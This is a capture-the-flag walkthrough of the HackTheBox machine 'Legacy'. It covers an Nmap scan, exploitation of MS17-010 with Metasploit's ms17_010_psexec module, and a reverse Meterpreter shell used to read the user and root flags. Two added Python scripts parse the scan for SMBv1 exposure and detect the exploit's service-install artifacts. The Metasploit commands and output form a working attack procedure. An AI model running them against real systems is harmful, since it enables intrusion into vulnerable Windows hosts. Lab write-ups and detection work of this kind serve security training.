HackTheBox: Legacy

I first started by running Nmap against the host to discover running services:

# Nmap 7.80 scan initiated Tue Sep 15 14:12:48 2020 as: nmap -O -sV -sC -p- -oN scan 10.10.10.4
Nmap scan report for 10.10.10.4
Host is up (0.019s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (94%), General Dynamics embedded (88%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows XP (92%), Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows 2000 SP4 (91%), Microsoft Windows XP SP2 or Windows Server 2003 (91%), Microsoft Windows Server 2003 (90%), Microsoft Windows XP Professional SP3 (90%), Microsoft Windows XP SP2 (90%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h29m49s, deviation: 2h07m16s, median: 4d22h59m49s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:df:de (VMware)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2020-09-20T23:14:42+03:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Sep 15 14:15:43 2020 -- 1 IP address (1 host up) scanned in 175.19 seconds

We can see from this output that two ports are open, 139 and 445, both SMB. The smb-os-discovery script also ran and identified the host as Windows XP, smb-security-mode shows message signing disabled, and SMB2 negotiation failed, so the host only speaks SMBv1. There were no SMB shares, however.
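As an added example (not part of the original write-up), the Python script below parses Nmap's normal output format (the `-oN` file shown above), pulls out the open ports and the host-script results, and turns them into the findings a defender would record for this host: SMB exposed, message signing disabled, SMB2 negotiation failed (an SMBv1-only host), and an end-of-life OS fingerprint. The scan text is a condensed copy of the report above, embedded inline so the script runs offline; the function names and the finding wording are my own.

```python
"""Parse an Nmap normal-output (-oN) report and flag SMB exposure indicators.

Added example for this write-up, not code from the original post. It reads the
scan shown above and reports what a defender would want to know before an
MS17-010-class attack is tried against the host.
"""
import re

# Condensed copy of the scan report above (constructed input for this example).
SCAN = """\
Nmap scan report for 10.10.10.4
Host is up (0.019s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Computer name: legacy
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
"""

# One port line: "445/tcp  open   microsoft-ds  Windows XP microsoft-ds"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)(?:\s+(.*))?$")


def parse_open_ports(text):
    """Return [(port, service, version)] for every port Nmap reports as open."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m and m.group(3) == "open":
            ports.append((int(m.group(1)), m.group(4), (m.group(5) or "").strip()))
    return ports


def parse_host_scripts(text):
    """Turn the '|'-prefixed NSE block into {script: {key: value}}.

    A line like '| smb-security-mode:' opens a section; indented lines under it
    are key/value pairs; a one-line script such as '|_smb2-time: ...' is stored
    under the key '_'.
    """
    scripts = {}
    current = None
    for line in text.splitlines():
        if not line.startswith("|"):
            continue
        body = line[1:]
        if body.startswith("_"):          # '|_' marks the last line of a script
            body = body[1:]
        nested = body.startswith("  ")    # indented -> key under the current script
        key, _, value = body.strip().partition(":")
        key, value = key.strip(), value.strip()
        if nested and current is not None:
            scripts[current][key] = value
        else:
            current = key
            scripts[current] = {"_": value} if value else {}
    return scripts


def assess(text):
    """Return the findings a defender would record for this host."""
    findings = []
    smb_ports = [p for p, _, _ in parse_open_ports(text) if p in (139, 445)]
    if smb_ports:
        findings.append(f"SMB reachable on {smb_ports}; restrict to management networks")
    scripts = parse_host_scripts(text)
    signing = scripts.get("smb-security-mode", {}).get("message_signing", "")
    if signing.startswith("disabled"):
        findings.append("SMB message signing disabled: traffic can be relayed or tampered with")
    smb2 = scripts.get("smb2-time", {}).get("_", "")
    if "negotiation failed" in smb2.lower():
        findings.append("SMB2 negotiation failed: host is SMBv1-only, the MS17-010 exposure class")
    os_name = scripts.get("smb-os-discovery", {}).get("OS", "")
    if "Windows XP" in os_name or "Windows 2000" in os_name:
        findings.append(f"End-of-life OS reported over SMB: {os_name}")
    return findings


if __name__ == "__main__":
    for finding in assess(SCAN):
        print("-", finding)
```

Run it as-is to see the four findings for this host; point `SCAN` at the contents of a real `-oN` file to use it on other reports. The script-block parser relies only on the `|`, `|_` and two-space indentation conventions of Nmap's normal output, so it also handles scripts that are not shown here.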

EternalBlue (MS17-010) is one of the most common SMB exploits, and a likely fit given that the OS is Windows XP. I started Metasploit, loaded the ms17_010_psexec module, and ran it:

msf5 > use windows/smb/ms17_010_psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 10.10.10.4
rhost => 10.10.10.4
msf5 exploit(windows/smb/ms17_010_psexec) > set lhost 10.10.14.16
lhost => 10.10.14.16
msf5 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 10.10.14.16:4444 
[*] 10.10.10.4:445 - Target OS: Windows 5.1
[*] 10.10.10.4:445 - Filling barrel with fish... done
[*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.4:445 -    [*] Preparing dynamite...
[*] 10.10.10.4:445 -            [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.4:445 -    [+] Successfully Leaked Transaction!
[*] 10.10.10.4:445 -    [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x82256da8
[*] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.4:445 - Selecting native target
[*] 10.10.10.4:445 - Uploading payload... KpPkSPCi.exe
[*] 10.10.10.4:445 - Created \KpPkSPCi.exe...
[+] 10.10.10.4:445 - Service started successfully...
[*] Sending stage (176195 bytes) to 10.10.10.4
[*] 10.10.10.4:445 - Deleting \KpPkSPCi.exe...
[*] Meterpreter session 1 opened (10.10.14.16:4444 -> 10.10.10.4:1033) at 2020-09-15 15:26:50 -0400

meterpreter > 

meterpreter > cd /

meterpreter > ls
Listing: C:\
============

Mode                Size               Type  Last modified                    Name
----                ----               ----  -------------                    ----
100777/rwxrwxrwx    0                  fil   2017-03-16 01:30:44 -0400        AUTOEXEC.BAT
100666/rw-rw-rw-    0                  fil   2017-03-16 01:30:44 -0400        CONFIG.SYS
40777/rwxrwxrwx     0                  dir   2017-03-16 01:20:29 -0400        Documents and Settings
100444/r--r--r--    0                  fil   2017-03-16 01:30:44 -0400        IO.SYS
100444/r--r--r--    0                  fil   2017-03-16 01:30:44 -0400        MSDOS.SYS
100555/r-xr-xr-x    47564              fil   2008-04-13 16:13:04 -0400        NTDETECT.COM
40555/r-xr-xr-x     0                  dir   2017-03-16 01:20:57 -0400        Program Files
40777/rwxrwxrwx     0                  dir   2017-03-16 01:20:30 -0400        System Volume Information
40777/rwxrwxrwx     0                  dir   2017-03-16 01:18:34 -0400        WINDOWS
100666/rw-rw-rw-    211                fil   2017-03-16 01:20:02 -0400        boot.ini
100444/r--r--r--    250048             fil   2008-04-13 18:01:44 -0400        ntldr
60401544/r-xr--r--  48691528838709231  fif   1551977431-11-15 22:18:24 -0500  pagefile.sys
100666/rw-rw-rw-    0                  fil   2020-09-20 17:03:03 -0400        pwned.txt

meterpreter > cd Documents\ and\ Settings 
meterpreter > ls
Listing: C:\Documents and Settings
==================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40777/rwxrwxrwx  0     dir   2017-03-16 02:07:20 -0400  Administrator
40777/rwxrwxrwx  0     dir   2017-03-16 01:20:29 -0400  All Users
40777/rwxrwxrwx  0     dir   2017-03-16 01:20:29 -0400  Default User
40777/rwxrwxrwx  0     dir   2017-03-16 01:32:52 -0400  LocalService
40777/rwxrwxrwx  0     dir   2017-03-16 01:32:42 -0400  NetworkService
40777/rwxrwxrwx  0     dir   2017-03-16 01:33:41 -0400  john

meterpreter > cd john
meterpreter > ls
Listing: C:\Documents and Settings\john
=======================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40555/r-xr-xr-x   0       dir   2017-03-16 01:33:41 -0400  Application Data
40777/rwxrwxrwx   0       dir   2017-03-16 01:33:41 -0400  Cookies
40777/rwxrwxrwx   0       dir   2017-03-16 01:33:41 -0400  Desktop
40555/r-xr-xr-x   0       dir   2017-03-16 01:33:41 -0400  Favorites
40777/rwxrwxrwx   0       dir   2017-03-16 01:33:41 -0400  Local Settings
40555/r-xr-xr-x   0       dir   2017-03-16 01:33:41 -0400  My Documents
100666/rw-rw-rw-  524288  fil   2017-03-16 01:33:41 -0400  NTUSER.DAT
100666/rw-rw-rw-  1024    fil   2017-03-16 01:33:41 -0400  NTUSER.DAT.LOG
40777/rwxrwxrwx   0       dir   2017-03-16 01:33:41 -0400  NetHood
40777/rwxrwxrwx   0       dir   2017-03-16 01:33:41 -0400  PrintHood
40555/r-xr-xr-x   0       dir   2017-03-16 01:33:41 -0400  Recent
40555/r-xr-xr-x   0       dir   2017-03-16 01:33:41 -0400  SendTo
40555/r-xr-xr-x   0       dir   2017-03-16 01:33:41 -0400  Start Menu
40777/rwxrwxrwx   0       dir   2017-03-16 01:33:41 -0400  Templates
100666/rw-rw-rw-  178     fil   2017-03-16 01:33:42 -0400  ntuser.ini

meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Documents and Settings\john\Desktop
===============================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 02:19:32 -0400  user.txt

meterpreter > cat user.txt
[REDACTED]
meterpreter >

From this output you can see that the exploit ran successfully and I was given a Meterpreter shell. From this shell I was able to browse to the Desktop of the john user and read the user flag.
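For the detection side, as an added example that is not part of the original post or of Metasploit: the module output above shows the artifacts this technique leaves on the host (an eight-letter mixed-case `.exe` written at a share root, a service started from it, and the file deleted afterwards). The script below flags service-install records of that shape. The records are constructed to resemble the fields of Windows System log Event ID 7045 (A service was installed in the system); the service name in the positive sample is assumed to equal the binary's stem, which the page does not show, and the case-switch threshold is a heuristic of mine.

```python
"""Flag service-install records that match the artifact pattern visible in the
Metasploit output above: an eight-letter mixed-case .exe dropped at a share or
drive root, started as a service, then deleted.

Added example for this write-up, not code from the post or from Metasploit.
The records are constructed to resemble Windows System log Event ID 7045
(A service was installed in the system), reduced to the fields this check uses.
"""
import re

# Constructed sample records. The first mirrors the binary name shown in the
# module output above; its service name is assumed (the page does not show it).
# The other two are benign installs used as negatives.
EVENTS = [
    {"time": "2020-09-15T15:26:49", "host": "LEGACY", "service_name": "KpPkSPCi",
     "image_path": r"\KpPkSPCi.exe", "account": "LocalSystem"},
    {"time": "2020-09-10T09:00:00", "host": "LEGACY", "service_name": "VMTools",
     "image_path": r"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe",
     "account": "LocalSystem"},
    {"time": "2020-09-11T10:30:00", "host": "LEGACY", "service_name": "BackupAgent",
     "image_path": r"C:\Backup\services.exe", "account": "LocalSystem"},
]

CASE_SWITCH_MIN = 3  # heuristic threshold for a "random-looking" mixed-case name


def case_switches(stem):
    """Count upper/lower transitions; random names such as KpPkSPCi score high."""
    switches, prev = 0, None
    for ch in stem:
        if not ch.isalpha():
            continue
        cur = ch.isupper()
        if prev is not None and cur != prev:
            switches += 1
        prev = cur
    return switches


def looks_random(basename):
    """True for an eight-letter .exe whose casing flips at least CASE_SWITCH_MIN times."""
    m = re.fullmatch(r"([A-Za-z]{8})\.exe", basename, re.IGNORECASE)
    return bool(m) and case_switches(m.group(1)) >= CASE_SWITCH_MIN


def at_root(image_path):
    """True when the binary sits directly in a drive root (C:\\x.exe) or a share root (\\x.exe)."""
    parts = [p for p in re.split(r"[\\/]", image_path.strip('"')) if p]
    if len(parts) == 1:
        return True
    return len(parts) == 2 and re.fullmatch(r"[A-Za-z]:", parts[0]) is not None


def reasons_for(event):
    """Return the indicators that fire for one 7045-style record."""
    image = event["image_path"].strip('"')
    basename = re.split(r"[\\/]", image)[-1]
    stem = basename[:-4] if basename.lower().endswith(".exe") else basename
    reasons = []
    if looks_random(basename):
        reasons.append("random-looking 8-letter binary name")
    if at_root(image):
        reasons.append("binary located at drive/share root")
    if event["service_name"].lower() == stem.lower():
        reasons.append("service name equals binary name")
    return reasons


def flag_events(events):
    """Keep records whose name looks random and that show at least one more indicator."""
    hits = []
    for ev in events:
        reasons = reasons_for(ev)
        if "random-looking 8-letter binary name" in reasons and len(reasons) >= 2:
            hits.append({**ev, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in flag_events(EVENTS):
        print(hit["time"], hit["host"], hit["image_path"], "->", "; ".join(hit["reasons"]))
```

The name heuristic alone is not enough: several legitimate Windows binaries have eight-letter names (`services.exe`, `explorer.exe`), which is why the case-switch count and a second indicator are required before a record is flagged. Feeding real 7045 events into `EVENTS` requires only mapping the Service Name and Service File Name fields onto `service_name` and `image_path`.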

I next tried to browse to the Administrator desktop and was able to do this as well, allowing me to also capture the root flag.

meterpreter > cd /
meterpreter > ls
Listing: C:\
============

Mode                Size               Type  Last modified                    Name
----                ----               ----  -------------                    ----
100777/rwxrwxrwx    0                  fil   2017-03-16 01:30:44 -0400        AUTOEXEC.BAT
100666/rw-rw-rw-    0                  fil   2017-03-16 01:30:44 -0400        CONFIG.SYS
40777/rwxrwxrwx     0                  dir   2017-03-16 01:20:29 -0400        Documents and Settings
100444/r--r--r--    0                  fil   2017-03-16 01:30:44 -0400        IO.SYS
100444/r--r--r--    0                  fil   2017-03-16 01:30:44 -0400        MSDOS.SYS
100555/r-xr-xr-x    47564              fil   2008-04-13 16:13:04 -0400        NTDETECT.COM
40555/r-xr-xr-x     0                  dir   2017-03-16 01:20:57 -0400        Program Files
40777/rwxrwxrwx     0                  dir   2017-03-16 01:20:30 -0400        System Volume Information
40777/rwxrwxrwx     0                  dir   2017-03-16 01:18:34 -0400        WINDOWS
100666/rw-rw-rw-    211                fil   2017-03-16 01:20:02 -0400        boot.ini
100444/r--r--r--    250048             fil   2008-04-13 18:01:44 -0400        ntldr
60401544/r-xr--r--  48691528838709231  fif   1551977431-11-15 22:18:24 -0500  pagefile.sys
100666/rw-rw-rw-    0                  fil   2020-09-20 17:03:03 -0400        pwned.txt

meterpreter > cd Documents\ and\ Settings 
meterpreter > ls
Listing: C:\Documents and Settings
==================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40777/rwxrwxrwx  0     dir   2017-03-16 02:07:20 -0400  Administrator
40777/rwxrwxrwx  0     dir   2017-03-16 01:20:29 -0400  All Users
40777/rwxrwxrwx  0     dir   2017-03-16 01:20:29 -0400  Default User
40777/rwxrwxrwx  0     dir   2017-03-16 01:32:52 -0400  LocalService
40777/rwxrwxrwx  0     dir   2017-03-16 01:32:42 -0400  NetworkService
40777/rwxrwxrwx  0     dir   2017-03-16 01:33:41 -0400  john

meterpreter > cd Administrator 
meterpreter > ls
Listing: C:\Documents and Settings\Administrator
================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40555/r-xr-xr-x   0       dir   2017-03-16 02:07:20 -0400  Application Data
40777/rwxrwxrwx   0       dir   2017-03-16 02:07:20 -0400  Cookies
40777/rwxrwxrwx   0       dir   2017-03-16 02:07:20 -0400  Desktop
40555/r-xr-xr-x   0       dir   2017-03-16 02:07:20 -0400  Favorites
40777/rwxrwxrwx   0       dir   2017-03-16 02:07:20 -0400  Local Settings
40555/r-xr-xr-x   0       dir   2017-03-16 02:07:20 -0400  My Documents
100666/rw-rw-rw-  786432  fil   2017-03-16 02:07:20 -0400  NTUSER.DAT
100666/rw-rw-rw-  1024    fil   2017-03-16 02:07:20 -0400  NTUSER.DAT.LOG
40777/rwxrwxrwx   0       dir   2017-03-16 02:07:20 -0400  NetHood
40777/rwxrwxrwx   0       dir   2017-03-16 02:07:20 -0400  PrintHood
40555/r-xr-xr-x   0       dir   2017-03-16 02:07:20 -0400  Recent
40555/r-xr-xr-x   0       dir   2017-03-16 02:07:20 -0400  SendTo
40555/r-xr-xr-x   0       dir   2017-03-16 02:07:20 -0400  Start Menu
40777/rwxrwxrwx   0       dir   2017-03-16 02:07:20 -0400  Templates
100666/rw-rw-rw-  178     fil   2017-03-16 02:07:21 -0400  ntuser.ini

meterpreter > cd Desktop 
meterpreter > ls
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 02:18:19 -0400  root.txt

meterpreter > cat root.txt 
[REDACTED]

meterpreter >
